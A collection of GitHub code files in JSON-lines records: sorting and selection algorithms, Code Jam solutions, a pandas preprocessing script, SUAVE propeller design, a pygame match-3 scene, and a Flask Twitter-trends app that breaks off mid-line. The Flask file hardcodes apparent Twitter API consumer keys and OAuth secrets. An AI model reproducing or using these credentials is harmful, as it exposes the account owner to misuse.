В данной процедуре\nиспользуется модифицированный алгоритм быстрой сортировки, в котором после\nразделения рассматривается только одна часть массива, содержащая искомый\nэлемент.\n'''\n\n\nfrom random import randint\n\n\ndef randomized_select(A, i, p=0, r=None):\n    if r is None:\n        r = len(A)-1\n    A = A.copy()\n    return _randomized_select(A, i, p, r)\n\n\ndef _randomized_select(A, i, p, r):\n    if p == r:\n        return A[p]\n    q = randomized_partion(A, p, r)\n    k = q - p\n    if i == k:\n        return A[q]\n    elif i < k:\n        return _randomized_select(A, i, p, q-1)\n    else:\n        return _randomized_select(A, i-k-1, q+1, r)\n\n\ndef randomized_partion(A, p, r):\n    i = randint(p, r)\n    A[i], A[r] = A[r], A[i]\n    return partion(A, p, r)\n\n\ndef partion(A, p, r):\n    x = A[r]\n    i = p - 1\n    count_equal = 0\n    for j in range(p, r):\n        if A[j] <= x:\n            if A[j] == x:\n                count_equal += 1\n            i += 1\n            A[i], A[j] = A[j], A[i]\n    A[i+1], A[r] = A[r], A[i+1]\n    if count_equal == r - p:\n        return (p + r) // 2\n    else:\n        return i + 1\n\n\ndef main():\n    A = [13, 19, 9, 5, 9, 12, 8, 7, 4, 21, 2, 6, 11]\n    print(randomized_select(A, 3))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Leonid-T/Algorithms","sub_path":"Divide-and-conquer/Randomized select/randomized_select.py","file_name":"randomized_select.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"7103167111","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n\n        m=[]\n        def dfs(root,k,m):\n\n            if not root:\n                return\n\n            dfs(root.left,k,m)\n            m.append(root.val)\n            dfs(root.right,k,m)\n            return\n\n        dfs(root,k,m)\n\n\n        return m[k-1]\n        \n\n\n\n\n        ","repo_name":"msaisridattaDev/leetcode","sub_path":"230-kth-smallest-element-in-a-bst/kth-smallest-element-in-a-bst.py","file_name":"kth-smallest-element-in-a-bst.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"34811264755","text":"# импорт библиотек\r\nimport pandas as pd\r\n\r\n# опции отображения\r\npd.set_option('display.max_columns', 10)\r\npd.set_option('display.expand_frame_repr', False)\r\n# Путь к обрабатываемому датасету с данными\r\npath_data = 'ecommerce_data.csv'\r\n\r\n\r\ndef func_main(path: str) -> pd.DataFrame:\r\n    \"\"\"Предварительная обработка датасета\"\"\"\r\n    # Считываем датасет\r\n    df = pd.read_csv(path, sep=',')\r\n    # Приводим названия столбцов датасета к нижнему регистру\r\n    list_col = list(map(str.lower, df.columns))\r\n    df.columns = list_col\r\n    # Избавляемся от времени и трансформируем строку-дату в правильный формат\r\n    df['invoicedate'] = df['invoicedate'].apply(lambda x: x.split(' ')[0])\r\n    df['invoicedate'] = pd.to_datetime(df['invoicedate'], format='%m/%d/%Y')\r\n    # Рассчитываем сумму покупки по каждому товару\r\n    df['amount'] = df['quantity'] * df['unitprice']\r\n    # Удаляем ненужные для дальнейшего анализа столбцы\r\n    df = df.drop(['stockcode', 'description', 'quantity', 'unitprice'], axis=1)\r\n    # Заполняем строки, где не указан номер покупателя, константой 777777\r\n    values = {'customerid': 777777}\r\n    df = df.fillna(value=values)\r\n    df['customerid'] = df['customerid'].astype('int')\r\n    # Округляем общую сумму покупки до целого числа\r\n    df = df.round({'amount': 0})\r\n    df['amount'] = 
df['amount'].astype('int')\r\n # Удаляем все строки, в которых есть пропуски перед группировкой\r\n df = df.dropna()\r\n # Группируем строки, чтобы прийти к детализации до уровня одного чека\r\n df_result = df.groupby(by=['invoiceno', 'invoicedate', 'customerid', 'country']).agg({'amount': sum}).reset_index()\r\n return df_result\r\n\r\n\r\nif __name__ == \"__main__\":\r\n tbl = func_main(path_data)\r\n tbl.to_csv('ecommerce_data_new.csv', sep=',', index=False, date_format='%d.%m.%Y')\r\n print('A file is genereted!')\r\n","repo_name":"grishenkovp/publications","sub_path":"Habr/unit_economy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"ru","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"23577744051","text":"import math\r\n\r\nfin = open('C-small-attempt4.in', 'r')\r\nfout = open('C-small-attempt4.out', 'w')\r\n\r\nt = int(fin.readline())\r\nfor i in xrange(1, t + 1):\r\n hd, ad, hk, ak, b, d = [int(s) for s in fin.readline().strip().split(\" \")]\r\n if ad >= hk:\r\n print>> fout, \"Case #{}: {}\".format(i, 1)\r\n continue\r\n if max(ad + b, ad + ad) >= hk and hd > ak:\r\n print>> fout, \"Case #{}: {}\".format(i, 2)\r\n continue\r\n if hd <= ak - d + ak - 2 * d:\r\n print>> fout, \"Case #{}: {}\".format(i, 'IMPOSSIBLE')\r\n continue\r\n\r\n r_attack = 10000000\r\n for j in range(0, 100):\r\n temp_r = math.ceil(hk * 1.0 / (b * j + ad)) + j\r\n r_attack = min(temp_r, r_attack)\r\n r_attack = int(r_attack)\r\n\r\n r_cure = 10000000\r\n for x in range(0, 101):\r\n t_hd = hd\r\n t_ak = ak\r\n t_cure = x\r\n if x > 0:\r\n for j in range(x):\r\n if t_hd <= t_ak - d:\r\n t_cure += 1\r\n t_hd = hd - t_ak\r\n t_ak -= d\r\n if t_ak < 0:\r\n t_ak = 0\r\n t_hd -= t_ak\r\n if r_attack > 1:\r\n if hd <= t_ak + t_ak:\r\n continue\r\n for j in range(r_attack - 1):\r\n if t_hd <= t_ak:\r\n t_cure += 1\r\n t_hd = hd - t_ak\r\n t_hd -= t_ak\r\n if t_cure < r_cure:\r\n r_cure = t_cure\r\n r_cure = int(r_cure)\r\n print>>fout, \"Case #{}: {}\".format(i, r_attack + r_cure)\r\nfin.close()\r\nfout.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_205/52.py","file_name":"52.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23583828831","text":"#! 
/usr/bin/env python3\n\nimport os\nimport os.path\nimport argparse\nfrom pprint import pprint\n\ndef solve(N, R, O, Y, G, B, V):\n # With O, G and V, only possible sequences are:\n # BOBOB, RGRGR, YVYVYV\n if O > B or G > R or V > Y:\n return \"IMPOSSIBLE\"\n\n if R == G and N == R+G:\n print(\"Special case RG\")\n return \"RG\" * G\n if O == B and N == O+B:\n print(\"Special case BO\")\n return \"BO\" * B\n if V == Y and N == Y+V:\n print(\"Special case YV, N={}\".format(N))\n return \"YV\" * V\n\n special = {}\n if G > 0:\n special[\"R\"] = \"RG\" * G + \"R\"\n R -= G\n N -= 2*G\n if O > 0:\n special[\"B\"] = \"BO\" * O + \"B\"\n B -= O\n N -= 2*O\n if V > 0:\n special[\"Y\"] = \"YV\" * V + \"Y\"\n Y -= V\n N -= 2*V\n\n result = \"\"\n values = [[\"R\", R], [\"Y\", Y], [\"B\", B]]\n last = ''\n\n while N > 0:\n values.sort(key=lambda x: x[1], reverse=True)\n assert(values[0][1] > 0)\n index = 0\n first_char = values[index][0]\n\n if first_char == last:\n print(\"Can't use first\")\n index = 1\n if values[index][1] == 0:\n return \"IMPOSSIBLE\"\n\n if N <= 3 and len(result) > 0 and result[0] != last:\n print(\"Fixing termination, result[0]={}, last={}\".format(result[0], last))\n for i in range(3):\n if values[i][0] == result[0] and values[i][1] != 0:\n index = i\n break\n\n last = values[index][0]\n if last in special:\n result += special[last]\n del special[last]\n else:\n result += values[index][0]\n\n values[index][1] -= 1\n N -= 1\n print(\"{} {}={} {}={} {}={}\".format(result, values[0][0], values[0][1], values[1][0], values[1][1], values[2][0], values[2][1]))\n\n if len(result) == 0 or result[0] == result[-1]:\n return \"IMPOSSIBLE\"\n\n return result\n\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filename\", help='Filename')\n\n args = parser.parse_args()\n\n outputfile = os.path.splitext(args.filename)[0] + \".out\"\n\n with open(args.filename, 'r') as f:\n with open(outputfile, 'w+') as fout:\n num_tests = int(f.readline().strip())\n for testcase in range(1,num_tests+1):\n N, R, O, Y, G, B, V = [int(x) for x in f.readline().split(\" \")]\n print(\"Case #{} Input: num={} R={} O={} Y={} G={} B={} V={}\".format(testcase, N, R, O, Y, G, B, V))\n result = solve(N, R, O, Y, G, B, V)\n print(\"Output: {}\".format(result))\n fout.write(\"Case #{}: {}\\n\".format(testcase, result))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/613.py","file_name":"613.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20394137065","text":"# 导入cv模块\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nexposure=[2000,3000,4000,5000,6000,7000,8000,9000,10000,11000,12000,13000,14000,15000,16000,17000,18000,19000,20000,70000,120000,170000,220000]\navgnoise_exp=[]\nfor j in range(0,len(exposure)):\n print(\"./fixgain/\"+str(exposure[j])+\"(0).jpg\")\n raw_img = cv.imread(\"./fixgain/2000(0).jpg\")\n size = raw_img.shape\n print(\"!\")\n imgarray = np.zeros([10, size[0]*size[1]], dtype=np.float)\n for i in range(0, 10):\n img = cv.imread(\"./fixgain/\"+str(exposure[j])+\"(\"+ str(i) +\").jpg\")\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n img = img.astype(np.float32)\n imgarray[i, :] = img.flatten()\n avgarray = np.mean(imgarray, 0)\n std_noise=np.std(avgarray)\n avgnoise_exp.append(std_noise)\nplt.plot(exposure,avgnoise_exp,linewidth=2)\nplt.title(\"fix pattern 
noise-exp\",fontsize=18)\nplt.xlabel(\"exposure\",fontsize=14)\nplt.ylabel(\"avg_noise\",fontsize=14)\nplt.savefig(\"./fpnoise_exp.png\")","repo_name":"Justherozen/Inteligent_visual_imformation_acquisition","sub_path":"A1/Fix_pattern_noise.py","file_name":"Fix_pattern_noise.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24349687977","text":"import bpy\n\nparts = [\"field_particles\", \"field_particles.001\"]\nvelo = [None, 0, 0.062, 0.1, 0.062, 0]\n\nscene = bpy.data.scenes[0]\n\nfor fno in [1, 2, 3, 4, 5]:\n scene.frame_set(fno)\n for p in parts:\n bpy.data.particles[p].object_align_factor[0] = velo[fno]\n bpy.context.scene.render.filepath = \"wheatfield%04d\" % fno\n bpy.ops.render.render(write_still = True)\n\n","repo_name":"tothxa/wl_graphics_re-export","sub_path":"tribe_immo/wheatfield/wheat_anim_frames.py","file_name":"wheat_anim_frames.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38837823403","text":"## @ingroup Methods-Propulsion\n# propeller_design.py\n# \n# Created: Jul 2014, E. Botero\n# Modified: Feb 2016, E. Botero\n# Jul 2017, M. Clarke\n# Mar 2020, M. Clarke\n# Sep 2020, M. Clarke\n# Feb 2022, M. Clarke\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\nimport SUAVE\nfrom SUAVE.Core import Data\nfrom SUAVE.Core.Utilities import interp2d\nimport numpy as np\nimport scipy as sp \nfrom scipy.optimize import root \nfrom SUAVE.Methods.Geometry.Two_Dimensional.Cross_Section.Airfoil.compute_airfoil_properties \\\n import compute_airfoil_properties\nfrom SUAVE.Methods.Geometry.Two_Dimensional.Cross_Section.Airfoil.compute_naca_4series \\\n import compute_naca_4series\nfrom SUAVE.Methods.Geometry.Two_Dimensional.Cross_Section.Airfoil.import_airfoil_geometry\\\n import import_airfoil_geometry\n# ----------------------------------------------------------------------\n# Propeller Design\n# ----------------------------------------------------------------------\n\ndef propeller_design(prop,number_of_stations=20):\n \"\"\" Optimizes propeller chord and twist given input parameters.\n \n Inputs:\n Either design power or thrust\n prop_attributes.\n hub radius [m]\n tip radius [m]\n rotation rate [rad/s]\n freestream velocity [m/s]\n number of blades \n number of stations\n design lift coefficient\n design_altitude [m]\n airfoil data\n \n Outputs:\n Twist distribution [array of radians]\n Chord distribution [array of meters]\n \n Assumptions/ Source:\n Based on Design of Optimum Propellers by Adkins and Liebeck\n \n \"\"\"\n # Unpack\n N = number_of_stations # this number determines the discretization of the propeller into stations\n B = prop.number_of_blades\n R = prop.tip_radius\n Rh = prop.hub_radius\n omega = prop.angular_velocity # Rotation Rate in rad/s\n V = prop.freestream_velocity # Freestream Velocity\n Cl = prop.design_Cl # Design Lift Coefficient\n alt = prop.design_altitude\n Thrust = prop.design_thrust\n Power = prop.design_power\n airfoils = prop.Airfoils \n a_loc = prop.airfoil_polar_stations\n \n if (Thrust == None) and (Power== None):\n raise AssertionError('Specify either design thrust or design power!')\n \n elif (Thrust!= None) and (Power!= None):\n raise AssertionError('Specify either design thrust or design power!') \n \n if V == 0.0:\n V = 1E-6 
\n \n # Calculate atmospheric properties\n atmosphere = SUAVE.Analyses.Atmospheric.US_Standard_1976()\n atmo_data = atmosphere.compute_values(alt)\n \n p = atmo_data.pressure[0]\n T = atmo_data.temperature[0]\n rho = atmo_data.density[0]\n speed_of_sound = atmo_data.speed_of_sound[0]\n mu = atmo_data.dynamic_viscosity[0]\n nu = mu/rho\n \n # Nondimensional thrust\n if (Thrust!= None) and (Power == None):\n Tc = 2.*Thrust/(rho*(V*V)*np.pi*(R*R)) \n Pc = 0.0 \n \n elif (Thrust== None) and (Power != None):\n Tc = 0.0 \n Pc = 2.*Power/(rho*(V*V*V)*np.pi*(R*R)) \n \n tol = 1e-10 # Convergence tolerance\n\n # Step 1, assume a zeta\n zeta = 0.1 # Assume to be small initially\n \n # Step 2, determine F and phi at each blade station\n \n chi0 = Rh/R # Where the propeller blade actually starts\n chi = np.linspace(chi0,1,N+1) # Vector of nondimensional radii\n chi = chi[0:N]\n lamda = V/(omega*R) # Speed ratio\n r = chi*R # Radial coordinate\n x = omega*r/V # Nondimensional distance\n diff = 1.0 # Difference between zetas\n n = omega/(2*np.pi) # Cycles per second\n D = 2.*R \n c = 0.2 * np.ones_like(chi)\n \n # if user defines airfoil, check dimension of stations\n num_airfoils = len(airfoils.keys())\n if num_airfoils>0:\n if len(a_loc) != N:\n raise AssertionError('\\nDimension of airfoil sections must be equal to number of stations on propeller') \n \n for _,airfoil in enumerate(airfoils): \n if airfoil.geometry == None: # first, if airfoil geometry data not defined, import from geoemtry files\n if airfoil.NACA_4_series_flag: # check if naca 4 series of airfoil from datafile\n airfoil.geometry = compute_naca_4series(airfoil.coordinate_file,airfoil.number_of_points)\n else:\n airfoil.geometry = import_airfoil_geometry(airfoil.coordinate_file,airfoil.number_of_points) \n \n if airfoil.polars == None: # compute airfoil polars for airfoils\n airfoil.polars = compute_airfoil_properties(airfoil.geometry, airfoil_polar_files= airfoil.polar_files) \n else:\n print('\\nDefaulting to scaled DAE51') \n \n while diff>tol: \n # assign chord distribution\n prop.chord_distribution = c \n \n #Things that need a loop\n Tcnew = Tc \n tanphit = lamda*(1.+zeta/2.) # Tangent of the flow angle at the tip\n phit = np.arctan(tanphit) # Flow angle at the tip\n tanphi = tanphit/chi # Flow angle at every station\n f = (B/2.)*(1.-chi)/np.sin(phit) \n F = (2./np.pi)*np.arccos(np.exp(-f)) #Prandtl momentum loss factor\n phi = np.arctan(tanphi) # Flow angle at every station\n \n #Step 3, determine the product Wc, and RE\n G = F*x*np.cos(phi)*np.sin(phi) #Circulation function\n Wc = 4.*np.pi*lamda*G*V*R*zeta/(Cl*B)\n Ma = Wc/speed_of_sound\n RE = Wc/nu\n\n if num_airfoils>0:\n # assign initial values \n alpha0 = np.ones(N)*0.05\n \n # solve for optimal alpha to meet design Cl target\n sol = root(objective, x0 = alpha0 , args=(airfoils,a_loc,RE,Cl,N))\n alpha = sol.x\n \n # query surrogate for sectional Cls at stations \n Cdval = np.zeros_like(RE) \n for j,airfoil in enumerate(airfoils): \n pd = airfoil.polars\n Cdval_af = interp2d(RE,alpha,pd.reynolds_numbers, pd.angle_of_attacks, pd.drag_coefficients)\n locs = np.where(np.array(a_loc) == j )\n Cdval[locs] = Cdval_af[locs] \n \n else: \n Cdval = (0.108*(Cl**4)-0.2612*(Cl**3)+0.181*(Cl**2)-0.0139*Cl+0.0278)*((50000./RE)**0.2)\n alpha = Cl/(2.*np.pi)\n \n #More Cd scaling from Mach from AA241ab notes for turbulent skin friction\n Tw_Tinf = 1. + 1.78*(Ma**2)\n Tp_Tinf = 1. 
+ 0.035*(Ma**2) + 0.45*(Tw_Tinf-1.)\n Tp = Tp_Tinf*T\n Rp_Rinf = (Tp_Tinf**2.5)*(Tp+110.4)/(T+110.4) \n Cd = ((1/Tp_Tinf)*(1/Rp_Rinf)**0.2)*Cdval\n \n #Step 5, change Cl and repeat steps 3 and 4 until epsilon is minimized \n epsilon = Cd/Cl \n \n #Step 6, determine a and a', and W \n a = (zeta/2.)*(np.cos(phi)**2.)*(1.-epsilon*np.tan(phi)) \n W = V*(1.+a)/np.sin(phi)\n \n #Step 7, compute the chord length and blade twist angle \n c = Wc/W\n beta = alpha + phi # Blade twist angle\n \n #Step 8, determine 4 derivatives in I and J \n Iprime1 = 4.*chi*G*(1.-epsilon*np.tan(phi))\n Iprime2 = lamda*(Iprime1/(2.*chi))*(1.+epsilon/np.tan(phi)\n )*np.sin(phi)*np.cos(phi)\n Jprime1 = 4.*chi*G*(1.+epsilon/np.tan(phi))\n Jprime2 = (Jprime1/2.)*(1.-epsilon*np.tan(phi))*(np.cos(phi)**2.) \n dchi = (chi[1]-chi[0])*np.ones_like(Jprime1)\n \n #Integrate derivatives from chi=chi0 to chi=1 \n I1 = np.dot(Iprime1,dchi)\n I2 = np.dot(Iprime2,dchi)\n J1 = np.dot(Jprime1,dchi)\n J2 = np.dot(Jprime2,dchi) \n\n #Step 9, determine zeta and and Pc or zeta and Tc \n if (Pc==0.)&(Tc!=0.): \n #First Case, Thrust is given\n #Check to see if Tc is feasible, otherwise try a reasonable number\n if Tcnew>=I2*(I1/(2.*I2))**2.:\n Tcnew = I2*(I1/(2.*I2))**2.\n zetan = (I1/(2.*I2)) - ((I1/(2.*I2))**2.-Tcnew/I2)**0.5\n\n elif (Pc!=0.)&(Tc==0.): \n #Second Case, Thrust is given\n zetan = -(J1/(J2*2.)) + ((J1/(J2*2.))**2.+Pc/J2)**0.5 \n \n #Step 10, repeat starting at step 2 with the new zeta\n diff = abs(zeta-zetan)\n \n zeta = zetan\n \n #Step 11, determine propeller efficiency etc...\n if (Pc==0.)&(Tc!=0.): \n if Tcnew>=I2*(I1/(2.*I2))**2.:\n Tcnew = I2*(I1/(2.*I2))**2.\n print('Tc infeasible, reset to:')\n print(Tcnew) \n #First Case, Thrust is given\n zeta = (I1/(2.*I2)) - ((I1/(2.*I2))**2.-Tcnew/I2)**0.5\n Pc = J1*zeta + J2*(zeta**2.)\n Tc = I1*zeta - I2*(zeta**2.)\n \n elif (Pc!=0.)&(Tc==0.): \n #Second Case, Thrust is given\n zeta = -(J1/(2.*J2)) + ((J1/(2.*J2))**2.+Pc/J2)**0.5\n Tc = I1*zeta - I2*(zeta**2.)\n Pc = J1*zeta + J2*(zeta**2.) \n \n # Calculate mid-chord alignment angle, MCA\n # This is the distance from the mid chord to the line axis out of the center of the blade\n # In this case the 1/4 chords are all aligned \n MCA = c/4. 
- c[0]/4.\n \n Thrust = Tc*rho*(V**2)*np.pi*(R**2)/2\n Power = Pc*rho*(V**3)*np.pi*(R**2)/2 \n Ct = Thrust/(rho*(n*n)*(D*D*D*D))\n Cp = Power/(rho*(n*n*n)*(D*D*D*D*D)) \n \n # compute max thickness distribution \n t_max = np.zeros(N) \n t_c = np.zeros(N) \n if num_airfoils>0:\n for j,airfoil in enumerate(airfoils): \n a_geo = airfoil.geometry\n locs = np.where(np.array(a_loc) == j )\n t_max[locs] = a_geo.max_thickness*c[locs] \n t_c[locs] = a_geo.thickness_to_chord \n else: \n c_blade = np.repeat(np.atleast_2d(np.linspace(0,1,N)),N, axis = 0)* np.repeat(np.atleast_2d(c).T,N, axis = 1)\n t = (5*c_blade)*(0.2969*np.sqrt(c_blade) - 0.1260*c_blade - 0.3516*(c_blade**2) + 0.2843*(c_blade**3) - 0.1015*(c_blade**4)) # local thickness distribution\n t_max = np.max(t,axis = 1) \n t_c = np.max(t,axis = 1) /c \n \n # Nondimensional thrust\n if prop.design_power == None: \n prop.design_power = Power[0] \n elif prop.design_thrust == None: \n prop.design_thrust = Thrust[0] \n \n # blade solidity\n r = chi*R # Radial coordinate \n blade_area = sp.integrate.cumtrapz(B*c, r-r[0])\n sigma = blade_area[-1]/(np.pi*R**2) \n \n prop.design_torque = Power[0]/omega\n prop.max_thickness_distribution = t_max\n prop.twist_distribution = beta\n prop.chord_distribution = c\n prop.radius_distribution = r\n prop.number_of_blades = int(B)\n prop.design_power_coefficient = Cp\n prop.design_thrust_coefficient = Ct\n prop.mid_chord_alignment = MCA\n prop.thickness_to_chord = t_c\n prop.blade_solidity = sigma\n\n return prop\n\n \ndef objective(x,airfoils,a_loc,RE,Cl,N):\n # query surrogate for sectional Cls at stations \n Cl_vals = np.zeros(N) \n for j,airfoil in enumerate(airfoils): \n pd = airfoil.polars\n Cl_af = interp2d(RE,x,pd.reynolds_numbers, pd.angle_of_attacks, pd.lift_coefficients)\n locs = np.where(np.array(a_loc) == j )\n Cl_vals[locs] = Cl_af[locs] \n \n # compute Cl residual \n Cl_residuals = Cl_vals - Cl \n return Cl_residuals \n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Methods/Propulsion/propeller_design.py","file_name":"propeller_design.py","file_ext":"py","file_size_in_byte":12578,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"36916676584","text":"import pygame\nfrom pygame.event import Event\n\nfrom src import Constants\nfrom src.Animation import Animation\nfrom src.Quests.Quest import Quest\nfrom src.Scenes.Match3.FlowersGrid import FlowersGrid\nfrom src.Scenes.QuestScene import QuestScene\nfrom src.Utils import get_distance\n\n\nclass Match3Scene(QuestScene):\n __slots__ = (\"grid\", \"grabbed\", \"grab_point\", \"dest_tile\", \"last_click\", \"click_cooldown\")\n\n def __init__(self, main_window, name, player, quest: Quest) -> None:\n QuestScene.__init__(self, main_window=main_window, player=player, name=name, quest=quest)\n self.grid = FlowersGrid(parent=self, difficult=quest.difficult,\n position=(Constants.WINDOW_W / 2, Constants.WINDOW_H / 2), size=(8, 8))\n self.grabbed = None\n self.grab_point = 0, 0\n self.dest_tile = None\n self.last_click = 0\n self.click_cooldown = 250\n\n def on_scene_started(self) -> None:\n super().on_scene_started()\n self._timer_label.set_text(text=self._localization.get_string(\"time\"))\n self._score_label.set_text(text=self._localization.get_string(\"score\"))\n self._score_val_label.set_text(text=\"0\")\n self._timer_label.set_position((self.grid.rect.x, 10))\n self._timer_val_label.set_position(\n (self._timer_label.position[0] + self._timer_label.size[0] + 10, 
self._timer_label.position[1]))\n\n self._score_label.set_position(\n (self.grid.rect.x, self._timer_label.size[1] + self._timer_label.position[1] - 10))\n self._score_val_label.set_position(\n (self._score_label.position[0] + self._score_label.size[0] + 10, self._score_label.position[1]))\n\n self._finish_button.set_text(text=self._localization.get_string(\"finish_label\"))\n self._finish_button.set_padding(padding=(self._localization.get_params_by_string(\"finish_label\")[\"x_off\"], 0))\n self._finish_button.set_position((self.grid.rect.centerx - self._finish_button.size[0] / 2,\n self.grid.rect.bottomleft[1]\n + (Constants.WINDOW_H - self.grid.rect.bottomleft[1])\n / 2 - self._finish_button.size[1] / 2))\n\n def update(self, dt: float) -> None:\n super().update(dt)\n self.last_click += dt\n if self.grabbed:\n current_dest = self.dest_tile\n flower = self.grabbed.flower\n if not flower:\n self.grabbed = None\n return\n gr = self.grabbed.rect\n neighbors = self.grabbed.neighbors\n x, y = pygame.mouse.get_pos()\n flower.rect.left = x - self.grab_point[0]\n flower.rect.top = y - self.grab_point[1]\n dx = abs(flower.rect.left - self.grabbed.rect.left)\n dy = abs(flower.rect.top - self.grabbed.rect.top)\n if dx >= dy:\n if flower.rect.left < gr.left:\n if neighbors[\"left\"]:\n flower.rect.left = max(flower.rect.left, neighbors[\"left\"].rect.left)\n self.dest_tile = neighbors[\"left\"]\n if self.dest_tile.flower:\n right = gr.left + (self.dest_tile.rect.right - flower.rect.left)\n self.dest_tile.flower.rect.right = right\n else:\n flower.rect.left = gr.left\n elif flower.rect.right > gr.right:\n if neighbors[\"right\"]:\n flower.rect.right = min(flower.rect.right, neighbors[\"right\"].rect.right)\n self.dest_tile = neighbors[\"right\"]\n if self.dest_tile.flower:\n self.dest_tile.flower.rect.left = gr.right - (flower.rect.right - self.dest_tile.rect.left)\n else:\n flower.rect.right = gr.right\n flower.rect.top = gr.top\n else:\n if flower.rect.top < gr.top:\n if neighbors[\"up\"]:\n flower.rect.top = max(flower.rect.top, neighbors[\"up\"].rect.top)\n self.dest_tile = neighbors[\"up\"]\n if self.dest_tile.flower:\n self.dest_tile.flower.rect.bottom = gr.top - (flower.rect.top - self.dest_tile.rect.bottom)\n else:\n flower.rect.top = gr.top\n elif flower.rect.bottom > gr.bottom:\n if neighbors[\"down\"]:\n flower.rect.bottom = min(flower.rect.bottom, neighbors[\"down\"].rect.bottom)\n self.dest_tile = neighbors[\"down\"]\n if self.dest_tile.flower:\n self.dest_tile.flower.rect.top = gr.bottom - (flower.rect.bottom - self.dest_tile.rect.top)\n else:\n flower.rect.bottom = gr.bottom\n flower.rect.left = gr.left\n\n if current_dest and current_dest != self.dest_tile:\n if current_dest.flower:\n current_dest.flower.rect.topleft = current_dest.rect.topleft\n\n self.grid.bonus -= self.grid.bonus_cooldown * dt\n if self.grid.bonus <= 0: # TODO: optimize it\n self.grid.done = True\n\n self.grid.update(dt)\n self._score_val_label.set_text(text=str(self.score))\n\n def _time_over_handle(self) -> None:\n super()._time_over_handle()\n self._timer_val_label.set_text(\"\")\n self._timer_label.set_text(text=self._localization.get_string(\"time_over\"))\n\n def handle_events(self, event: Event) -> None:\n super().handle_events(event)\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.last_click < self.click_cooldown:\n return\n else:\n self.last_click = 0\n for cell in self.grid.cells.values():\n if cell.rect.collidepoint(event.pos) and cell.flower:\n self.grabbed = cell\n self.grid.score_multiplier = 1\n 
self.grab_point = \\\n (\n event.pos[0] - self.grabbed.flower.rect.left, event.pos[1] - self.grabbed.flower.rect.top\n )\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.grabbed:\n if self.dest_tile and not self.dest_tile.flower:\n self.grid.reseat_flower(self.grabbed)\n return\n valid = self.grid.check_move(self.grabbed, self.dest_tile)\n if valid:\n self.swap_tiles(self.grabbed, self.dest_tile)\n else:\n self.grid.reseat_flower(self.grabbed)\n self.grid.reseat_flower(self.dest_tile)\n self.grabbed = None\n\n def draw(self, surface: pygame.Surface) -> None:\n super().draw(surface)\n self.grid.draw(surface)\n if self.grabbed and self.grabbed.flower:\n self.grabbed.flower.draw(surface)\n\n def swap_tiles(self, grabbed_tile, dest_tile) -> None:\n gf = grabbed_tile.flower\n df = dest_tile.flower\n speed = 3.5\n dist = get_distance(gf.rect.topleft, dest_tile.rect.topleft)\n if dist != 0:\n duration = int(speed * dist)\n a1 = Animation(left=dest_tile.rect.left, top=dest_tile.rect.top, duration=duration, round_values=True)\n a1.start(gf.rect)\n a2 = Animation(left=grabbed_tile.rect.left, top=grabbed_tile.rect.top, duration=duration, round_values=True)\n a2.start(df.rect)\n self.grid.animations.add(a1, a2)\n dest_tile.flower = gf\n grabbed_tile.flower = df\n self.grid.recheck = True\n","repo_name":"ludwici/BeeIsland","sub_path":"src/Scenes/Match3/Match3Scene.py","file_name":"Match3Scene.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35523458331","text":"from flask import *\nimport tweepy\nimport json\n\napp = Flask(__name__)\nCONSUMER_KEY = 'o6mEPsrK6p646e15PXpo5Le6K'\nCONSUMER_SECRET = 'TD6pZD871HODoEisFsea13ncIc96gL2TDU6Y6uHXNggszQmCo6'\nOAUTH_TOKEN = '3192285595-GogD8gSEWVEqXHbMM8T7RkYmgbveWkqwnSffzMk'\nOAUTH_TOKEN_SECRET = 'HDqt9yA52HKsgmWSyNGYLwrCXzrtwOQSoCzcWN5gkbnij'\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n# filename=open(argfile,'r')\n# f=filename.readlines()\n# filename.close()\n\ntrends1 = api.trends_place('2295405')\n\n# d=api.trends_available()\n# dic_woeid={}\n# for x in d:\n# dic_woeid[x['name'].lower()]=x['woeid']\n\ntrends_woeid=[]\nfor x in trends1[0]['trends']:\n if x['name'].startswith('#'):\n # print(x)\n temp={}\n temp['name'],temp['query']=(x['name'], x['name'][1:])\n trends_woeid.append(temp)\n\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\",trends=trends_woeid)\n\n@app.route('/')\ndef view_hashtag(hashtag):\n query='#'+hashtag\n searched_tweets = [status._json for status in tweepy.Cursor(api.search, q=query).items(100)]\n # tweets = 